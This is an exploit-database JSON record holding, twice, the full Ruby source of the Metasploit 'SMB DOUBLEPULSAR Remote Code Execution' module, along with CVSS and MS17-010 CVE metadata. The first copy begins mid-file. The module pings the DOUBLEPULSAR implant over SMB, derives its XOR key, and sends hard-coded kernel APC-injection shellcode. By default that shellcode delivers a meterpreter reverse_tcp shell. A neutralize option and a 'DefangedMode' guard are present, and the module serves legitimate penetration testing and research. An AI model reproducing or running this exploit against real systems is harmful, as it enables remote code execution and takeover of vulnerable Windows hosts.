proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-21] #"}, "lastseen": "2021-09-20T21:24:01", "differentElements": ["sourceData"], "edition": 20}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "78b9fe9ec81a45632b2d56b3697d91a1", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-22T06:19:54", "history": [], "viewCount": 110, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700099.PRM", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-27802", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27613"]}, {"type": 
"packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:146236", "PACKETSTORM:142603", "PACKETSTORM:154690"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0146"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96705", "SMNTC-96707", "SMNTC-96709", "SMNTC-96703", "SMNTC-96706"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", 
"TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-09-22T06:19:54", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-22T06:19:54", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires 
Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 
'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to 
proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
